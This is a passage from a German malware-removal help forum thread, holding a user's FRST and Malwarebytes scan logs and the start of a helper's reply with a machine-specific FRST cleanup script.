2010-06-02 06:21 - 2010-06-02 06:21 - 0232635 _____ () C:\Program Files (x86)\Aug2009_d3dx10_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0192131 _____ () C:\Program Files (x86)\Aug2009_d3dx10_42_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0136301 _____ () C:\Program Files (x86)\Aug2009_d3dx11_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0105044 _____ () C:\Program Files (x86)\Aug2009_d3dx11_42_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0930116 _____ () C:\Program Files (x86)\Aug2009_d3dx9_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0728456 _____ () C:\Program Files (x86)\Aug2009_d3dx9_42_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0122408 _____ () C:\Program Files (x86)\Aug2009_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093106 _____ () C:\Program Files (x86)\Aug2009_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0273264 _____ () C:\Program Files (x86)\Aug2009_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0272642 _____ () C:\Program Files (x86)\Aug2009_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1357976 _____ () C:\Program Files 
(x86)\Dec2005_d3dx9_28_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1079456 _____ () C:\Program Files (x86)\Dec2005_d3dx9_28_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0212807 _____ () C:\Program Files (x86)\DEC2006_d3dx10_00_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0191720 _____ () C:\Program Files (x86)\DEC2006_d3dx10_00_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1571154 _____ () C:\Program Files (x86)\DEC2006_d3dx9_32_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1574376 _____ () C:\Program Files (x86)\DEC2006_d3dx9_32_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0192475 _____ () C:\Program Files (x86)\DEC2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0145599 _____ () C:\Program Files (x86)\DEC2006_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0089944 _____ (Microsoft Corporation) C:\Program Files (x86)\DSETUP.dll 2010-06-02 06:22 - 2010-06-02 06:22 - 1801048 _____ () C:\Program Files (x86)\dsetup32.dll 2010-06-02 06:22 - 2010-06-02 06:22 - 0042410 _____ () C:\Program Files (x86)\dxdllreg_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0537432 _____ () C:\Program Files (x86)\DXSETUP.exe 2010-06-02 06:22 - 2010-06-02 06:22 - 0094011 _____ () C:\Program Files (x86)\dxupdate.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1247499 _____ () C:\Program Files (x86)\Feb2005_d3dx9_24_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1013225 _____ () C:\Program Files (x86)\Feb2005_d3dx9_24_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1362796 _____ () C:\Program Files (x86)\Feb2006_d3dx9_29_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1084720 _____ () C:\Program Files (x86)\Feb2006_d3dx9_29_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0178359 _____ () C:\Program Files (x86)\Feb2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0132409 _____ () C:\Program Files (x86)\Feb2006_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0194675 _____ () C:\Program Files (x86)\FEB2007_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0147983 _____ () C:\Program 
Files (x86)\FEB2007_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0054678 _____ () C:\Program Files (x86)\Feb2010_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0020713 _____ () C:\Program Files (x86)\Feb2010_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0122446 _____ () C:\Program Files (x86)\Feb2010_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093180 _____ () C:\Program Files (x86)\Feb2010_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0276960 _____ () C:\Program Files (x86)\Feb2010_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0277191 _____ () C:\Program Files (x86)\Feb2010_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1336002 _____ () C:\Program Files (x86)\Jun2005_d3dx9_26_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1064925 _____ () C:\Program Files (x86)\Jun2005_d3dx9_26_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0180785 _____ () C:\Program Files (x86)\JUN2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0133671 _____ () C:\Program Files (x86)\JUN2006_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0699044 _____ () C:\Program Files (x86)\JUN2007_d3dx10_34_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0698472 _____ () C:\Program Files (x86)\JUN2007_d3dx10_34_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1607774 _____ () C:\Program Files (x86)\JUN2007_d3dx9_34_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1607286 _____ () C:\Program Files (x86)\JUN2007_d3dx9_34_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0197122 _____ () C:\Program Files (x86)\JUN2007_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0152909 _____ () C:\Program Files (x86)\JUN2007_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0867828 _____ () C:\Program Files (x86)\JUN2008_d3dx10_38_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0849919 _____ () C:\Program Files (x86)\JUN2008_d3dx10_38_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1792608 _____ () C:\Program Files (x86)\JUN2008_d3dx9_38_x64.cab 2010-06-02 06:22 - 2010-06-02 
06:22 - 1463878 _____ () C:\Program Files (x86)\JUN2008_d3dx9_38_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0055154 _____ () C:\Program Files (x86)\JUN2008_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021905 _____ () C:\Program Files (x86)\JUN2008_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0121054 _____ () C:\Program Files (x86)\JUN2008_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093128 _____ () C:\Program Files (x86)\JUN2008_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0269628 _____ () C:\Program Files (x86)\JUN2008_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0269024 _____ () C:\Program Files (x86)\JUN2008_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0944460 _____ () C:\Program Files (x86)\Jun2010_D3DCompiler_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0931471 _____ () C:\Program Files (x86)\Jun2010_D3DCompiler_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0752783 _____ () C:\Program Files (x86)\Jun2010_d3dcsx_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0762188 _____ () C:\Program Files (x86)\Jun2010_d3dcsx_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0235955 _____ () C:\Program Files (x86)\Jun2010_d3dx10_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0197283 _____ () C:\Program Files (x86)\Jun2010_d3dx10_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0138205 _____ () C:\Program Files (x86)\Jun2010_d3dx11_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0109445 _____ () C:\Program Files (x86)\Jun2010_d3dx11_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0937246 _____ () C:\Program Files (x86)\Jun2010_d3dx9_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0768036 _____ () C:\Program Files (x86)\Jun2010_d3dx9_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0124596 _____ () C:\Program Files (x86)\Jun2010_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093686 _____ () C:\Program Files (x86)\Jun2010_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0277338 _____ () C:\Program Files 
(x86)\Jun2010_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0278060 _____ () C:\Program Files (x86)\Jun2010_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0844884 _____ () C:\Program Files (x86)\Mar2008_d3dx10_37_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0818260 _____ () C:\Program Files (x86)\Mar2008_d3dx10_37_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1769862 _____ () C:\Program Files (x86)\Mar2008_d3dx9_37_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1443282 _____ () C:\Program Files (x86)\Mar2008_d3dx9_37_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0055058 _____ () C:\Program Files (x86)\Mar2008_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021867 _____ () C:\Program Files (x86)\Mar2008_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0122336 _____ () C:\Program Files (x86)\Mar2008_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093734 _____ () C:\Program Files (x86)\Mar2008_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0251194 _____ () C:\Program Files (x86)\Mar2008_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0226250 _____ () C:\Program Files (x86)\Mar2008_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1067160 _____ () C:\Program Files (x86)\Mar2009_d3dx10_41_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1040745 _____ () C:\Program Files (x86)\Mar2009_d3dx10_41_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1973702 _____ () C:\Program Files (x86)\Mar2009_d3dx9_41_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1612446 _____ () C:\Program Files (x86)\Mar2009_d3dx9_41_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0054600 _____ () C:\Program Files (x86)\Mar2009_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021298 _____ () C:\Program Files (x86)\Mar2009_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0121506 _____ () C:\Program Files (x86)\Mar2009_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0092740 _____ () C:\Program Files (x86)\Mar2009_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 
06:22 - 0275044 _____ () C:\Program Files (x86)\Mar2009_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0273018 _____ () C:\Program Files (x86)\Mar2009_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0864600 _____ () C:\Program Files (x86)\Nov2007_d3dx10_36_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0803884 _____ () C:\Program Files (x86)\Nov2007_d3dx10_36_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1802058 _____ () C:\Program Files (x86)\Nov2007_d3dx9_36_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1709360 _____ () C:\Program Files (x86)\Nov2007_d3dx9_36_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0046144 _____ () C:\Program Files (x86)\NOV2007_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0018496 _____ () C:\Program Files (x86)\NOV2007_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0196762 _____ () C:\Program Files (x86)\NOV2007_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0148264 _____ () C:\Program Files (x86)\NOV2007_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0994154 _____ () C:\Program Files (x86)\Nov2008_d3dx10_40_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0965421 _____ () C:\Program Files (x86)\Nov2008_d3dx10_40_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1906878 _____ () C:\Program Files (x86)\Nov2008_d3dx9_40_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1550796 _____ () C:\Program Files (x86)\Nov2008_d3dx9_40_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0054522 _____ () C:\Program Files (x86)\Nov2008_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021851 _____ () C:\Program Files (x86)\Nov2008_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0121794 _____ () C:\Program Files (x86)\Nov2008_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0092684 _____ () C:\Program Files (x86)\Nov2008_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0273960 _____ () C:\Program Files (x86)\Nov2008_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0272611 _____ () C:\Program Files 
(x86)\Nov2008_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0086037 _____ () C:\Program Files (x86)\Oct2005_xinput_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0045359 _____ () C:\Program Files (x86)\Oct2005_xinput_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1412902 _____ () C:\Program Files (x86)\OCT2006_d3dx9_31_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1127217 _____ () C:\Program Files (x86)\OCT2006_d3dx9_31_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0182361 _____ () C:\Program Files (x86)\OCT2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0138017 _____ () C:\Program Files (x86)\OCT2006_XACT_x86.cab 2015-07-05 04:14 - 2015-07-05 04:14 - 0000911 _____ () C:\Users\Kenny G\AppData\Local\recently-used.xbel 2014-07-31 10:50 - 2014-07-31 10:51 - 0022400 _____ () C:\ProgramData\RUNDLL32.EXE-1180-F.txt 2014-07-06 17:23 - 2014-07-06 17:23 - 0244720 _____ () C:\ProgramData\RUNDLL32.EXE-12956-F.txt 2014-07-27 17:22 - 2014-07-28 13:07 - 0079618 _____ () C:\ProgramData\RUNDLL32.EXE-1384-F.txt 2014-07-10 10:53 - 2014-07-10 17:12 - 0298281 _____ () C:\ProgramData\RUNDLL32.EXE-1424-F.txt 2014-07-19 22:13 - 2014-07-20 00:37 - 0113345 _____ () C:\ProgramData\RUNDLL32.EXE-1436-F.txt 2014-07-30 09:52 - 2014-07-30 13:45 - 0181914 _____ () C:\ProgramData\RUNDLL32.EXE-1596-F.txt 2014-07-21 20:18 - 2014-07-21 22:11 - 0087977 _____ () C:\ProgramData\RUNDLL32.EXE-1788-F.txt 2014-07-18 05:35 - 2014-07-18 11:01 - 0242621 _____ () C:\ProgramData\RUNDLL32.EXE-2188-F.txt 2014-07-31 18:04 - 2014-07-31 18:05 - 0001416 _____ () C:\ProgramData\RUNDLL32.EXE-2284-F.txt 2014-07-31 10:34 - 2014-07-31 10:45 - 0008414 _____ () C:\ProgramData\RUNDLL32.EXE-2308-F.txt 2014-07-18 22:37 - 2014-07-19 01:07 - 0118602 _____ () C:\ProgramData\RUNDLL32.EXE-2348-F.txt 2014-07-28 15:20 - 2014-07-28 15:52 - 0025184 _____ () C:\ProgramData\RUNDLL32.EXE-2444-F.txt 2014-07-29 22:22 - 2014-07-29 23:10 - 0038461 _____ () C:\ProgramData\RUNDLL32.EXE-2460-F.txt 2014-07-12 11:11 - 2014-07-12 12:12 
- 0048083 _____ () C:\ProgramData\RUNDLL32.EXE-2480-F.txt 2014-07-10 19:57 - 2014-07-10 20:25 - 0007207 _____ () C:\ProgramData\RUNDLL32.EXE-2584-F.txt 2014-07-29 10:41 - 2014-07-29 12:12 - 0071934 _____ () C:\ProgramData\RUNDLL32.EXE-2904-F.txt 2014-07-16 20:21 - 2014-07-17 22:12 - 0478880 _____ () C:\ProgramData\RUNDLL32.EXE-3004-F.txt 2014-07-20 08:08 - 2014-07-20 11:56 - 0181099 _____ () C:\ProgramData\RUNDLL32.EXE-3044-F.txt 2014-08-01 06:26 - 2014-08-01 13:03 - 0282818 _____ () C:\ProgramData\RUNDLL32.EXE-3108-F.txt 2014-07-10 22:41 - 2014-07-10 23:23 - 0033087 _____ () C:\ProgramData\RUNDLL32.EXE-3160-F.txt 2014-07-12 04:26 - 2014-07-12 05:10 - 0035209 _____ () C:\ProgramData\RUNDLL32.EXE-3164-F.txt 2014-07-28 18:24 - 2014-07-28 19:58 - 0074219 _____ () C:\ProgramData\RUNDLL32.EXE-3264-F.txt 2014-08-07 06:42 - 2014-08-07 09:07 - 0076563 _____ () C:\ProgramData\RUNDLL32.EXE-3272-F.txt 2014-08-12 17:39 - 2014-08-12 17:48 - 0005807 _____ () C:\ProgramData\RUNDLL32.EXE-3288-F.txt 2014-08-12 18:47 - 2014-08-12 21:55 - 0104772 _____ () C:\ProgramData\RUNDLL32.EXE-3308-F.txt 2014-08-15 13:01 - 2014-08-15 13:53 - 0017691 _____ () C:\ProgramData\RUNDLL32.EXE-3356-F.txt 2014-08-14 16:21 - 2014-08-14 18:56 - 0059067 _____ () C:\ProgramData\RUNDLL32.EXE-3396-F.txt 2014-08-16 03:06 - 2014-08-16 04:02 - 0018161 _____ () C:\ProgramData\RUNDLL32.EXE-3452-F.txt 2014-08-03 08:19 - 2014-08-03 14:26 - 0294846 _____ () C:\ProgramData\RUNDLL32.EXE-3468-F.txt 2014-08-01 13:28 - 2014-08-03 00:37 - 0583063 _____ () C:\ProgramData\RUNDLL32.EXE-3480-F.txt 2014-08-07 10:20 - 2014-08-08 02:21 - 0085411 _____ () C:\ProgramData\RUNDLL32.EXE-3500-F.txt 2014-08-16 02:53 - 2014-08-16 03:05 - 0004128 _____ () C:\ProgramData\RUNDLL32.EXE-3516-F.txt 2014-08-07 01:45 - 2014-08-07 05:13 - 0115168 _____ () C:\ProgramData\RUNDLL32.EXE-3524-F.txt 2014-08-14 11:31 - 2014-08-14 13:24 - 0035565 _____ () C:\ProgramData\RUNDLL32.EXE-3528-F.txt 2014-07-15 19:58 - 2014-07-15 21:04 - 0045897 _____ () 
C:\ProgramData\RUNDLL32.EXE-3548-F.txt 2014-08-15 20:50 - 2014-08-15 23:14 - 0052980 _____ () C:\ProgramData\RUNDLL32.EXE-3552-F.txt 2014-08-06 21:49 - 2014-08-06 23:29 - 0071408 _____ () C:\ProgramData\RUNDLL32.EXE-3560-F.txt 2014-08-04 05:01 - 2014-08-05 06:05 - 0508848 _____ () C:\ProgramData\RUNDLL32.EXE-3564-F.txt 2014-07-09 21:47 - 2014-07-09 23:03 - 0060832 _____ () C:\ProgramData\RUNDLL32.EXE-3576-F.txt 2014-08-12 15:19 - 2014-08-12 15:29 - 0005538 _____ () C:\ProgramData\RUNDLL32.EXE-3632-F.txt 2014-08-06 21:27 - 2014-08-06 21:30 - 0002580 _____ () C:\ProgramData\RUNDLL32.EXE-3656-F.txt 2014-08-08 03:06 - 2014-08-11 13:07 - 0049817 _____ () C:\ProgramData\RUNDLL32.EXE-3688-F.txt 2014-08-03 16:46 - 2014-08-03 20:12 - 0162566 _____ () C:\ProgramData\RUNDLL32.EXE-3716-F.txt 2014-07-26 00:51 - 2014-07-26 09:44 - 0140982 _____ () C:\ProgramData\RUNDLL32.EXE-3828-F.txt 2014-07-26 23:06 - 2014-07-31 18:22 - 0025692 _____ () C:\ProgramData\RUNDLL32.EXE-3836-F.txt 2014-07-27 01:58 - 2014-07-27 03:43 - 0082833 _____ () C:\ProgramData\RUNDLL32.EXE-3848-F.txt 2014-08-15 17:05 - 2014-08-15 18:28 - 0024905 _____ () C:\ProgramData\RUNDLL32.EXE-3900-F.txt 2014-08-05 09:40 - 2014-08-05 20:23 - 0262790 _____ () C:\ProgramData\RUNDLL32.EXE-4020-F.txt 2014-07-25 21:52 - 2014-07-28 22:06 - 0076241 _____ () C:\ProgramData\RUNDLL32.EXE-4028-F.txt 2014-07-30 03:30 - 2014-07-30 05:19 - 0086514 _____ () C:\ProgramData\RUNDLL32.EXE-4048-F.txt 2014-07-30 09:31 - 2014-07-30 09:50 - 0012645 _____ () C:\ProgramData\RUNDLL32.EXE-4088-F.txt 2014-07-21 04:57 - 2014-07-21 14:44 - 0070566 _____ () C:\ProgramData\RUNDLL32.EXE-4092-F.txt 2014-07-11 11:19 - 2014-07-11 22:30 - 0228731 _____ () C:\ProgramData\RUNDLL32.EXE-4136-F.txt 2014-07-09 10:18 - 2014-07-09 11:48 - 0071159 _____ () C:\ProgramData\RUNDLL32.EXE-4148-F.txt 2014-07-29 14:02 - 2014-07-29 20:15 - 0170297 _____ () C:\ProgramData\RUNDLL32.EXE-4196-F.txt 2014-07-26 14:42 - 2014-07-26 15:48 - 0052128 _____ () 
C:\ProgramData\RUNDLL32.EXE-4212-F.txt 2014-07-14 17:22 - 2014-07-14 23:13 - 0274928 _____ () C:\ProgramData\RUNDLL32.EXE-4220-F.txt 2014-07-24 16:43 - 2014-07-25 04:36 - 0333823 _____ () C:\ProgramData\RUNDLL32.EXE-4292-F.txt 2014-07-08 18:10 - 2014-07-08 19:36 - 0067558 _____ () C:\ProgramData\RUNDLL32.EXE-4304-F.txt 2014-07-15 21:56 - 2014-07-15 23:43 - 0084278 _____ () C:\ProgramData\RUNDLL32.EXE-4328-F.txt 2014-07-07 12:11 - 2014-07-07 12:11 - 0967929 _____ () C:\ProgramData\RUNDLL32.EXE-4416-F.txt 2014-07-25 04:43 - 2014-07-25 20:32 - 0390092 _____ () C:\ProgramData\RUNDLL32.EXE-4440-F.txt 2014-07-12 05:11 - 2014-07-12 05:13 - 0002034 _____ () C:\ProgramData\RUNDLL32.EXE-4444-F.txt 2014-07-22 05:15 - 2014-07-22 06:02 - 0037273 _____ () C:\ProgramData\RUNDLL32.EXE-4448-F.txt 2014-07-21 17:40 - 2014-07-21 18:08 - 0022362 _____ () C:\ProgramData\RUNDLL32.EXE-4452-F.txt 2014-07-31 17:44 - 2014-07-31 17:44 - 0000282 _____ () C:\ProgramData\RUNDLL32.EXE-4540-F.txt 2014-07-13 12:53 - 2014-07-13 14:32 - 0078792 _____ () C:\ProgramData\RUNDLL32.EXE-4584-F.txt 2014-07-07 12:12 - 2014-07-07 14:05 - 0090638 _____ () C:\ProgramData\RUNDLL32.EXE-4604-F.txt 2014-07-31 17:35 - 2014-07-31 17:38 - 0002205 _____ () C:\ProgramData\RUNDLL32.EXE-4648-F.txt 2014-07-13 18:37 - 2014-07-14 17:20 - 0170811 _____ () C:\ProgramData\RUNDLL32.EXE-4736-F.txt 2014-07-13 08:58 - 2014-07-13 12:49 - 0182356 _____ () C:\ProgramData\RUNDLL32.EXE-4744-F.txt 2014-07-16 15:41 - 2014-07-16 20:04 - 0202579 _____ () C:\ProgramData\RUNDLL32.EXE-4780-F.txt 2014-07-31 17:53 - 2014-07-31 18:02 - 0007265 _____ () C:\ProgramData\RUNDLL32.EXE-4804-F.txt 2014-07-07 20:59 - 2014-07-07 22:47 - 0084404 _____ () C:\ProgramData\RUNDLL32.EXE-4808-F.txt 2014-07-08 20:17 - 2014-07-24 15:47 - 0414838 _____ () C:\ProgramData\RUNDLL32.EXE-4840-F.txt 2014-07-22 11:02 - 2014-07-23 06:10 - 0175986 _____ () C:\ProgramData\RUNDLL32.EXE-4920-F.txt 2014-07-19 08:24 - 2014-07-20 23:01 - 0130594 _____ () 
C:\ProgramData\RUNDLL32.EXE-5048-F.txt 2014-07-08 20:04 - 2014-07-08 20:13 - 0007500 _____ () C:\ProgramData\RUNDLL32.EXE-5068-F.txt 2014-07-12 13:09 - 2014-07-13 00:47 - 0294315 _____ () C:\ProgramData\RUNDLL32.EXE-5072-F.txt 2014-07-26 12:36 - 2014-07-26 14:05 - 0069795 _____ () C:\ProgramData\RUNDLL32.EXE-704-F.txt 2014-08-13 09:50 - 2014-08-13 19:20 - 0161035 _____ () C:\ProgramData\RUNDLL32.EXE-780-F.txt 2014-07-30 21:15 - 2014-07-30 23:07 - 0088664 _____ () C:\ProgramData\RUNDLL32.EXE-784-F.txt 2014-07-15 10:41 - 2014-07-15 18:31 - 0370403 _____ () C:\ProgramData\RUNDLL32.EXE-808-F.txt 2014-07-06 17:24 - 2014-07-07 04:48 - 0338635 _____ () C:\ProgramData\RUNDLL32.EXE-9648-F.txt Einige Dateien in TEMP: ==================== C:\Users\Kenny G\AppData\Local\Temp\Uninstall.exe ==================== Bamital & volsnap ================= (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) C:\Windows\system32\winlogon.exe => Datei ist digital signiert C:\Windows\system32\wininit.exe => Datei ist digital signiert C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert C:\Windows\explorer.exe => Datei ist digital signiert C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert C:\Windows\system32\svchost.exe => Datei ist digital signiert C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert C:\Windows\system32\services.exe => Datei ist digital signiert C:\Windows\system32\User32.dll => Datei ist digital signiert C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert C:\Windows\system32\userinit.exe => Datei ist digital signiert C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert C:\Windows\system32\rpcss.dll => Datei ist digital signiert C:\Windows\system32\dnsapi.dll => Datei ist digital signiert C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert LastRegBack: 2015-09-21 19:16 ==================== Ende von 
FRST.txt ============================ Code:
Malwarebytes Anti-Malware
www.malwarebytes.org
Suchlaufdatum: 23.09.2015
Suchlaufzeit: 04:58
Protokolldatei: mabam neu.txt
Administrator: Ja
Version: 2.1.8.1057
Malware-Datenbank: v2015.09.26.02
Rootkit-Datenbank: v2015.09.22.01
Lizenz: Kostenlose Version
Malware-Schutz: Deaktiviert
Schutz vor bösartigen Websites: Deaktiviert
Selbstschutz: Deaktiviert
Betriebssystem: Windows 7
CPU: x64
Dateisystem: NTFS
Benutzer: Kenny G
Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 515167
Abgelaufene Zeit: 24 Min., 22 Sek.
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Aktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert
Prozesse: 0
(keine bösartigen Elemente erkannt)
Module: 0
(keine bösartigen Elemente erkannt)
Registrierungsschlüssel: 2
PUP.Optional.VOPackage, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\VOPackage, , [89f162d2701b0d29654c8a3f26deec14],
PUP.Optional.MyTubeTheater, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{C42C5197-0EE9-4940-893B-F4EF047DFF0F}, , [2159da5ac9c25ed8d04b05d3d1334cb4],
Registrierungswerte: 0
(keine bösartigen Elemente erkannt)
Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)
Ordner: 0
(keine bösartigen Elemente erkannt)
Dateien: 1
PUP.Optional.Downloader, C:\Users\Kenny G\Desktop\Alles\bewerbung\Desktop Notes - CHIP-Installer.exe, , [6515f3417f0caf87749e063a28d8cd33],
Physische Sektoren: 0
(keine bösartigen Elemente erkannt)
(end) |
27.09.2015, 04:38 | #9 |
/// Malwareteam | Malware-gen, Adware-gen ...etc. Thanks for your message, so let's carry on. Step 1: Please press the Windows key + R and type notepad into the Run window. Now copy the following text from the code box into the empty text document. Code:
ATTFilter
CloseProcesses:
R2 zuroluxy; C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [X]
C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\
HKLM Group Policy restriction on software: C:\Program Files\BitDefender
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung
HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung
2015-09-20 19:00 - 2015-09-20 19:00 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe
2015-09-19 17:25 - 2015-09-21 18:10 - 00000000 ____D C:\Program Files (x86)\Trojan Remover
cmd: type C:\task.vbs
2015-09-19 12:15 - 2015-09-19 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913---
